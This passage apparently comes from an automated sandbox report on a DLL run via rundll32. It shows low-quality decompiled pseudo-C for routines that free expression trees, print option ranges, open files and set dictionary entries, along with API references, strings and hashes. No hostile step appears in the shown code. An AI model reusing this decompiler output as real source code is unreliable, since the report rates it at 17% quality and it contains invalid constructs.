				_a4 = 0x10;
				 *__esp =  &_a60;
				__eax = E10026560();
				_a48 = __edi;
				if(__edi != 0) {
					__eax =  *(__edi + 0x18);
					_a52 = __eax;
					if(__eax != 0) {
						__edx = __eax[0x18];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x1c];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x20];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						E100290E0(__eax);
						__eax =  &_a52;
						E100290E0( &_a52);
						__edi = _a48;
					}
					__eax =  *(__edi + 0x1c);
					_a52 = __eax;
					if(__eax == 0) {
						L22:
						__eax =  *(__edi + 0x20);
						_a52 = __eax;
						if(__eax == 0) {
							L30:
							E100290E0(__edi);
							__eax =  &_a48;
							E100290E0( &_a48);
							goto L1;
						}
						__edx = __eax[0x18];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x1c];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x20];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						E100290E0(__eax);
						__eax =  &_a52;
						E100290E0( &_a52);
						__edi = _a48;
						goto L30;
					} else {
						__edx = __eax[0x18];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x1c];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x20];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						E100290E0(__eax);
						__eax =  &_a52;
						E100290E0( &_a52);
						__edi = _a48;
						goto L22;
					}
				}
				L1:
				 *_t120 = _t116;
				L100290D0();
				return _t118;
			}

0x10017261
0x10017268
0x1001726c
0x10017271
0x10017276
0x1001727a
0x1001727e
0x10017282
0x10017286
0x10017289
0x10017293
0x10017299
0x1001729b
0x1001729e
0x100172a4
0x100172aa
0x100172ad
0x100172b3
0x100172bb
0x100172c4
0x100172ca
0x100172d3
0x100172de
0x100172e2
0x100172e8
0x100172ed
0x100172f4
0x100172f9
0x100172f9
0x100172fd
0x10017300
0x10017306
0x1001730e
0x10017317
0x1001731d
0x10017326
0x10017331
0x10017335
0x1001733b
0x10017340
0x10017347
0x1001734c
0x1001734c
0x10017350
0x10017353
0x10017359
0x10017361
0x1001736a
0x10017370
0x10017379
0x10017384
0x10017388
0x1001738e
0x10017393
0x1001739a
0x1001739f
0x1001739f
0x100173a9
0x100173ae
0x100173b5
0x100173ba
0x100173ba
0x100173be
0x100173c1
0x100173c7
0x100174e1
0x100174e1
0x100174e4
0x100174ea
0x10017604
0x1001760a
0x1001760f
0x10017616
0x00000000
0x10017616
0x100174f0
0x100174f3
0x100174f9
0x10017501
0x1001750a
0x10017510
0x10017519
0x10017524
0x10017528
0x1001752e
0x10017533
0x1001753a
0x1001753f
0x1001753f
0x10017543
0x10017546
0x1001754c
0x10017554
0x1001755d
0x10017563
0x1001756c
0x10017577
0x1001757b
0x10017581
0x10017586
0x1001758d
0x10017592
0x10017592
0x10017596
0x10017599
0x1001759f
0x100175a7
0x100175b0
0x100175b6
0x100175bf
0x100175ca
0x100175ce
0x100175d4
0x100175d9
0x100175e0
0x100175e5
0x100175e5
0x100175ef
0x100175f4
0x100175fb
0x10017600
0x00000000
0x100173cd
0x100173cd
0x100173d0
0x100173d6
0x100173de
0x100173e7
0x100173ed
0x100173f6
0x10017401
0x10017405
0x1001740b
0x10017410
0x10017417
0x1001741c
0x1001741c
0x10017420
0x10017423
0x10017429
0x10017431
0x1001743a
0x10017440
0x10017449
0x10017454
0x10017458
0x1001745e
0x10017463
0x1001746a
0x1001746f
0x1001746f
0x10017473
0x10017476
0x1001747c
0x10017484
0x1001748d
0x10017493
0x1001749c
0x100174a7
0x100174ab
0x100174b1
0x100174b6
0x100174bd
0x100174c2
0x100174c2
0x100174cc
0x100174d1
0x100174d8
0x100174dd
0x00000000
0x100174dd
0x100173c7
0x1001724f
0x1001724f
0x10017252
0x10017260

APIs

mv_log.F086 ref: 10017289
mv_freep.F086 ref: 100172E8
mv_freep.F086 ref: 100172F4
mv_expr_free.F086 ref: 100172D9

Part of subcall function 10015280: mv_freep.F086 ref: 10015588
Part of subcall function 10015280: mv_freep.F086 ref: 10015594
Part of subcall function 10015280: mv_freep.F086 ref: 100155DB
Part of subcall function 10015280: mv_freep.F086 ref: 100155E7
Part of subcall function 10015280: mv_freep.F086 ref: 100155F6
Part of subcall function 10015280: mv_freep.F086 ref: 10015602
Part of subcall function 10015280: mv_freep.F086 ref: 10015667
Part of subcall function 10015280: mv_freep.F086 ref: 10015673
Part of subcall function 10015280: mv_freep.F086 ref: 100156BA

mv_expr_free.F086 ref: 100172CA

Part of subcall function 10015280: mv_freep.F086 ref: 1001542C
Part of subcall function 10015280: mv_freep.F086 ref: 10015438
Part of subcall function 10015280: mv_freep.F086 ref: 10015447
Part of subcall function 10015280: mv_freep.F086 ref: 10015453
Part of subcall function 10015280: mv_freep.F086 ref: 1001549A
Part of subcall function 10015280: mv_freep.F086 ref: 100154A6
Part of subcall function 10015280: mv_freep.F086 ref: 100154B5
Part of subcall function 10015280: mv_freep.F086 ref: 100154C1
Part of subcall function 10015280: mv_freep.F086 ref: 10015517
Part of subcall function 10015280: mv_freep.F086 ref: 10015523

mv_expr_free.F086 ref: 100172BB

Part of subcall function 10015280: mv_freep.F086 ref: 100152FA
Part of subcall function 10015280: mv_freep.F086 ref: 10015306
Part of subcall function 10015280: mv_freep.F086 ref: 1001534D
Part of subcall function 10015280: mv_freep.F086 ref: 10015359
Part of subcall function 10015280: mv_freep.F086 ref: 10015368
Part of subcall function 10015280: mv_freep.F086 ref: 10015374
Part of subcall function 10015280: mv_freep.F086 ref: 100153D9
Part of subcall function 10015280: mv_freep.F086 ref: 100153E5

mv_expr_free.F086 ref: 1001730E
mv_expr_free.F086 ref: 1001731D
mv_expr_free.F086 ref: 1001732C
mv_freep.F086 ref: 1001733B
mv_freep.F086 ref: 10017347
mv_expr_free.F086 ref: 10017361
mv_expr_free.F086 ref: 10017370
mv_expr_free.F086 ref: 1001737F
mv_freep.F086 ref: 1001738E
mv_freep.F086 ref: 1001739A
mv_freep.F086 ref: 100173A9
mv_freep.F086 ref: 100173B5
mv_expr_free.F086 ref: 100173DE
mv_expr_free.F086 ref: 100173ED
mv_expr_free.F086 ref: 100173FC
mv_freep.F086 ref: 1001740B
mv_freep.F086 ref: 10017417
mv_expr_free.F086 ref: 10017431
mv_expr_free.F086 ref: 10017440
mv_expr_free.F086 ref: 1001744F
mv_freep.F086 ref: 1001745E
mv_freep.F086 ref: 1001746A
mv_expr_free.F086 ref: 10017484
mv_expr_free.F086 ref: 10017493
mv_expr_free.F086 ref: 100174A2
mv_freep.F086 ref: 100174B1
mv_freep.F086 ref: 100174BD
mv_freep.F086 ref: 100174CC
mv_freep.F086 ref: 100174D8
mv_expr_free.F086 ref: 10017501
mv_expr_free.F086 ref: 10017510
mv_expr_free.F086 ref: 1001751F
mv_freep.F086 ref: 1001752E
mv_freep.F086 ref: 1001753A
mv_expr_free.F086 ref: 10017554
mv_expr_free.F086 ref: 10017563
mv_expr_free.F086 ref: 10017572
mv_freep.F086 ref: 10017581
mv_freep.F086 ref: 1001758D
mv_expr_free.F086 ref: 100175A7
mv_expr_free.F086 ref: 100175B6
mv_expr_free.F086 ref: 100175C5
mv_freep.F086 ref: 100175D4
mv_freep.F086 ref: 100175E0
mv_freep.F086 ref: 100175EF
mv_freep.F086 ref: 100175FB
mv_freep.F086 ref: 1001760A
mv_freep.F086 ref: 10017616

Strings

Invalid chars '%s' at the end of expression '%s', xrefs: 1001726C

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep$mv_expr_free$mv_log
String ID: Invalid chars '%s' at the end of expression '%s'
API String ID: 75827668-1422635149
Opcode ID: 62983a3bb7049393546072b60dbe7a8ba563001771bc1cc3aa272a22c57f5d9a
Instruction ID: 39916f313f6673765a40fa09fad6d79edb9ef4feb13054b409069c6d602bd34a
Opcode Fuzzy Hash: 62983a3bb7049393546072b60dbe7a8ba563001771bc1cc3aa272a22c57f5d9a
Instruction Fuzzy Hash: F3C133B95097459FC784EFA8D18591ABBF0FF88290F85586DF8C58B311D635E880CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1002C470 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 401COMMON

Download Yara Rule

APIs

mv_log.F086 ref: 1002BF79
mv_log.F086 ref: 1002C0B3
mv_log.F086 ref: 1002C0D8
mv_log.F086 ref: 1002C19C
mv_log.F086 ref: 1002C1CB
mv_log.F086 ref: 1002C16D

Part of subcall function 1002B460: mv_log.F086 ref: 1002B54C

mv_freep.F086 ref: 1002C241
mv_freep.F086 ref: 1002C24D
mv_log.F086 ref: 1002C29B
mv_log.F086 ref: 1002C4A5

Strings

%lld, xrefs: 1002C396
%c%c%c%c%c%c%c%c%c%c%c, xrefs: 1002C09E
(from , xrefs: 1002C158
%s, xrefs: 1002C0C3
%-12s , xrefs: 1002BF60
%d/%d, xrefs: 1002C5AB
(default , xrefs: 1002C282
%-12lld , xrefs: 1002C481
%-15s , xrefs: 1002BDF4
"%s", xrefs: 1002C2CF
to , xrefs: 1002C187

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log$mv_freep
String ID: %-15s $ %s$ (default $ (from $ to $"%s"$%-12lld $%-12s $%c%c%c%c%c%c%c%c%c%c%c$%d/%d$%lld
API String ID: 3216983768-538076109
Opcode ID: ac0072550d9328f0ee7ca60dd531dc481fba00c2972fbd96b99def6fa88064fd
Instruction ID: fb6ea6c6a0f2321fbc4e3f9226b07db0358892c939e969a2d4937e0b03469604
Opcode Fuzzy Hash: ac0072550d9328f0ee7ca60dd531dc481fba00c2972fbd96b99def6fa88064fd
Instruction Fuzzy Hash: 3D0204B4A08B458FC714CF68D48065EBBE1FF88750F95C92EF8A98B355E734E8448B42

Uniqueness

Uniqueness Score: -1.00%

Function 1002B460 Relevance: 47.4, APIs: 14, Strings: 13, Instructions: 142COMMON

Download Yara Rule

APIs

mv_log.F086 ref: 1002B54C
mv_log.F086 ref: 1002B595

Strings

I64_MIN, xrefs: 1002B5C3
INT_MIN, xrefs: 1002B55B
UINT32_MAX, xrefs: 1002B5E3
-FLT_MAX, xrefs: 1002B603
-FLT_MIN, xrefs: 1002B663
DBL_MIN, xrefs: 1002B6A1
-DBL_MIN, xrefs: 1002B53A
FLT_MIN, xrefs: 1002B643
INT_MAX, xrefs: 1002B583
I64_MAX, xrefs: 1002B5A3
FLT_MAX, xrefs: 1002B623
-DBL_MAX, xrefs: 1002B6E5
DBL_MAX, xrefs: 1002B682

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log
String ID: -DBL_MAX$-DBL_MIN$-FLT_MAX$-FLT_MIN$DBL_MAX$DBL_MIN$FLT_MAX$FLT_MIN$I64_MAX$I64_MIN$INT_MAX$INT_MIN$UINT32_MAX
API String ID: 2418673259-2628725902
Opcode ID: 4b69fef14bdbb6910b69d575034c011d7efd4a86ec80ae8f31d44e7f23f84011
Instruction ID: d7664abcd9faac0ce6b62ddf477cf7159e8170a1b3dfe873e1d3bd3be2708879
Opcode Fuzzy Hash: 4b69fef14bdbb6910b69d575034c011d7efd4a86ec80ae8f31d44e7f23f84011
Instruction Fuzzy Hash: 62512EB9908F548FC354EF25E49531EBAE1FF84380FD4C92D94C99B325E73989859B02

Uniqueness

Uniqueness Score: -1.00%

Function 100195E0 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 230COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10019633
mv_calloc.F086 ref: 1001964E
MultiByteToWideChar.KERNEL32 ref: 10019685
mv_calloc.F086 ref: 100196D7
mv_freep.F086 ref: 10019713
wcslen.MSVCRT ref: 1001971F
_wsopen.MSVCRT ref: 1001974B
mv_freep.F086 ref: 10019758
_sopen.MSVCRT ref: 1001978A
_errno.MSVCRT ref: 100197F5
wcslen.MSVCRT ref: 1001981B
mv_calloc.F086 ref: 10019857
wcscpy.MSVCRT ref: 10019872
wcscat.MSVCRT ref: 10019882
mv_freep.F086 ref: 1001988A
_errno.MSVCRT ref: 100198E1
mv_freep.F086 ref: 100198F4
mv_calloc.F086 ref: 10019912
wcscpy.MSVCRT ref: 10019929
wcscat.MSVCRT ref: 1001993C
_errno.MSVCRT ref: 10019946
_errno.MSVCRT ref: 10019958

Strings

\\?\UNC\, xrefs: 10019920
\\?\, xrefs: 10019869

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _errnomv_callocmv_freep$ByteCharMultiWidewcscatwcscpywcslen$_sopen_wsopen
String ID: \\?\$\\?\UNC\
API String ID: 2585690843-3019864461
Opcode ID: 378f72ee278ce5d6c1fa6c04bbe2b06fef19544e86df13747ce3d1d992c4811e
Instruction ID: 3dc82464431d1485f9b1200b51e46201d74a27639f097cc6c66f11d6c06c393f
Opcode Fuzzy Hash: 378f72ee278ce5d6c1fa6c04bbe2b06fef19544e86df13747ce3d1d992c4811e
Instruction Fuzzy Hash: 9391D3B49093059FC350EF69848421EBBE0FF89794F51892EF8D8CB290E774D980DB82

Uniqueness

Uniqueness Score: -1.00%

Function 10011560 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 216
stringCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E10011560(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, signed int* _a4, signed int* _a8, signed int _a12, intOrPtr _a16, signed int _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v50;
				void* _v56;
				void* _v60;
				void* _v64;
				intOrPtr _v92;
				signed int _v96;
				signed int* _v100;
				signed int* _v104;
				signed int* _t89;
				signed int* _t98;
				signed int* _t99;
				signed int _t104;
				void* _t105;
				int _t109;
				int _t110;
				void* _t112;
				signed int _t116;
				signed int* _t121;
				signed int _t127;
				int _t129;
				signed int _t130;
				intOrPtr* _t133;
				signed int* _t134;
				void* _t136;
				signed int* _t140;
				signed int* _t142;
				int _t143;
				void* _t144;
				signed int* _t149;
				void* _t150;
				signed int* _t152;
				signed int _t153;
				int _t155;
				signed int _t156;
				void _t158;
				signed int** _t162;
				signed int** _t163;

				_v16 = __ebx;
				_v12 = __esi;
				_v104 = 0x16;
				_t149 =  &_v50;
				 *_t163 = _t149;
				_v92 = _a16;
				_v96 = _a12;
				_v100 = 0x100b4200;
				_v8 = __edi;
				_t140 = _a8;
				_v4 = __ebp;
				E10011040();
				_v60 = 0;
				_t121 =  *_a4;
				 *_t163 = _t149;
				_v56 = 0;
				_t89 = E100292E0(_t121, _t140, _t149, 0);
				_v56 = _t89;
				if(_t140 == 0) {
					_t150 = 0xffffffea;
					L24:
					if(_t121 == 0) {
						L16:
						 *_t163 = _v60;
						L100290D0();
						 *_t163 = _v56;
						L100290D0();
						L17:
						return _t150;
					}
					L15:
					if( *_t121 == 0) {
						 *_t163 =  &(_t121[1]);
						E100290E0();
						 *_t163 = _a4;
						E100290E0();
					}
					goto L16;
				}
				_t162 = 0;
				_t152 = _t89;
				if((_a20 & 0x00000040) == 0) {
					_v104 = _t140;
					_v100 = 0;
					 *_t163 = _t121;
					_v96 = _a20 & 0xfffffff7;
					_t162 = E100110D0();
				}
				if((_a20 & 0x00000004) == 0) {
					 *_t163 = _t140;
					_t98 = E100292E0(_t121, _t140, _t152, _t162);
					_v60 = _t98;
					_t142 = _t98;
					if(_t121 == 0) {
						L19:
						 *_t163 = 8;
						_t99 = E10029100();
						_t142 = _v60;
						_t121 = _t99;
						 *_a4 = _t121;
						if(_t121 == 0 || _t142 == 0) {
							_t150 = 0xfffffff4;
							goto L24;
						} else {
							L21:
							_t152 = _v56;
							L4:
							if(_t152 == 0) {
								L14:
								_t150 = 0xfffffff4;
								goto L15;
							}
							if(_t162 == 0) {
								_v100 = 8;
								_v104 =  *_t121 + 1;
								 *_t163 = _t121[1];
								_t104 = E10029010();
								_t153 = _t104;
								if(_t104 == 0) {
									goto L14;
								}
								_t121[1] = _t104;
								_t127 =  *_t121;
								L10:
								_t105 = _v56;
								if(_t105 == 0) {
									if(_t127 == 0) {
										 *_t163 =  &(_t121[1]);
										E100290E0();
										 *_t163 = _a4;
										E100290E0();
									}
									_t150 = 0;
									 *_t163 =  &_v60;
									E100290E0();
								} else {
									_t133 = _t153 + _t127 * 8;
									 *((intOrPtr*)(_t133 + 4)) = _t105;
									 *_t133 = _v60;
									_t150 = 0;
									 *_t121 = _t127 + 1;
								}
								goto L17;
							}
							if((_a20 & 0x00000010) != 0) {
								 *_t163 = _t142;
								_t150 = 0;
								L100290D0();
								 *_t163 = _v56;
								L100290D0();
								goto L17;
							}
							_t134 = _a4;
							 *_t163 = _t134;
							if((_a20 & 0x00000020) != 0) {
								_v64 = _t134;
								_t109 = strlen(??);
								 *_t163 = _t152;
								_t143 = _t109;
								_t110 = strlen(??);
								 *_t163 = _v64;
								_t155 = _t110;
								_t68 = _t110 + 1; // 0x1
								_v104 = _t143 + _t68;
								_t112 = L10028DA0();
								if(_t112 == 0) {
									goto L14;
								}
								_t70 = _t155 + 1; // 0x1
								_t129 = _t70;
								_t144 = _t143 + _t112;
								_t136 = _v56;
								if(_t129 >= 8) {
									if((_t144 & 0x00000001) != 0) {
										_t130 =  *_t136 & 0x000000ff;
										_t144 = _t144 + 1;
										_t136 = _t136 + 1;
										 *(_t144 - 1) = _t130;
										_t129 = _t155;
									}
									if((_t144 & 0x00000002) != 0) {
										_t156 =  *_t136 & 0x0000ffff;
										_t144 = _t144 + 2;
										_t136 = _t136 + 2;
										_t129 = _t129 - 2;
										 *(_t144 - 2) = _t156;
									}
									if((_t144 & 0x00000004) != 0) {
										_t158 =  *_t136;
										_t144 = _t144 + 4;
										_t136 = _t136 + 4;
										_t129 = _t129 - 4;
										 *(_t144 - 4) = _t158;
									}
								}
								_v64 = _t112;
								memcpy(_t144, _t136, _t129);
								_t163 =  &(_t163[3]);
								 *_t163 =  &_v56;
								E100290E0();
								_v56 = _v64;
								goto L9;
							} else {
								L100290D0();
								L9:
								 *_t163 =  *_t162;
								L100290D0();
								_t116 =  *_t121;
								_t153 = _t121[1];
								_t32 = _t116 - 1; // -1
								_t127 = _t32;
								 *_t121 = _t127;
								 *_t162 =  *(_t153 + _t127 * 8);
								_a4 =  *(_t153 + 4 + _t127 * 8);
								goto L10;
							}
						}
					}
					if(_t98 != 0) {
						goto L21;
					}
					goto L14;
				}
				_v60 = _t140;
				if(_t121 == 0) {
					goto L19;
				}
				goto L4;
			}

0x10011563
0x1001156b
0x10011578
0x1001157c
0x10011580
0x10011583
0x1001158c
0x10011590
0x10011594
0x10011598
0x1001159c
0x100115a2
0x100115ab
0x100115af
0x100115b3
0x100115b6
0x100115ba
0x100115c1
0x100115c5
0x10011758
0x1001175d
0x1001175f
0x10011699
0x1001169d
0x100116a0
0x100116a9
0x100116ac
0x100116b1
0x100116c6
0x100116c6
0x1001168f
0x10011693
0x10011773
0x10011776
0x1001177f
0x10011782
0x10011782
0x00000000
0x10011693
0x100115cb
0x100115cd
0x100115d7
0x100116d0
0x100116dd
0x100116e1
0x100116e7
0x100116f0
0x100116f0
0x100115e5
0x10011670
0x10011673
0x1001167a
0x1001167e
0x10011680
0x10011700
0x10011700
0x10011707
0x1001170c
0x10011710
0x10011718
0x1001171a
0x10011840
0x00000000
0x10011728
0x10011728
0x10011728
0x100115f7
0x100115f9
0x1001168a
0x1001168a
0x00000000
0x1001168a
0x10011601
0x100117b5
0x100117bc
0x100117c3
0x100117c6
0x100117cd
0x100117cf
0x00000000
0x00000000
0x100117d5
0x100117d8
0x10011650
0x10011650
0x10011656
0x10011792
0x10011853
0x10011856
0x1001185f
0x10011862
0x10011862
0x1001179c
0x1001179e
0x100117a1
0x1001165c
0x1001165c
0x10011664
0x10011667
0x10011669
0x1001166b
0x1001166b
0x00000000
0x10011656
0x1001160f
0x10011738
0x1001173b
0x1001173d
0x10011746
0x10011749
0x00000000
0x10011749
0x10011615
0x10011620
0x10011623
0x100117e0
0x100117e4
0x100117e9
0x100117ec
0x100117ee
0x100117f7
0x100117fa
0x100117fc
0x10011800
0x10011804
0x1001180b
0x00000000
0x00000000
0x10011811
0x10011811
0x10011814
0x10011816
0x1001181d
0x10011876
0x10011898
0x1001189b
0x1001189c
0x1001189d
0x100118a0
0x100118a0
0x1001187e
0x100118a4
0x100118a7
0x100118aa
0x100118ad
0x100118b0
0x100118b0
0x10011886
0x10011888
0x1001188a
0x1001188d
0x10011890
0x10011893
0x10011893
0x10011886
0x1001181f
0x10011825
0x10011825
0x1001182b
0x1001182e
0x10011837
0x00000000
0x10011629
0x10011629
0x1001162e
0x10011631
0x10011634
0x10011639
0x1001163b
0x1001163e
0x1001163e
0x10011641
0x1001164a
0x1001164d
0x00000000
0x1001164d
0x10011623
0x1001171a
0x10011684
0x00000000
0x00000000
0x00000000
0x10011684
0x100115eb
0x100115f1
0x00000000
0x00000000
0x00000000

APIs

mv_strdup.F086 ref: 100115BA

Part of subcall function 100292E0: strlen.MSVCRT ref: 100292FE
Part of subcall function 100292E0: _aligned_realloc.MSVCRT ref: 10029325

mv_strdup.F086 ref: 10011673
mv_dict_get.F086 ref: 100116EB
mv_mallocz.F086 ref: 10011707
mv_freep.F086 ref: 100117A1
mv_realloc_array.F086 ref: 100117C6
strlen.MSVCRT ref: 100117E4
strlen.MSVCRT ref: 100117EE
mv_realloc.F086 ref: 10011804
mv_freep.F086 ref: 1001182E

Strings

%lld, xrefs: 10011587
, xrefs: 10011618

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
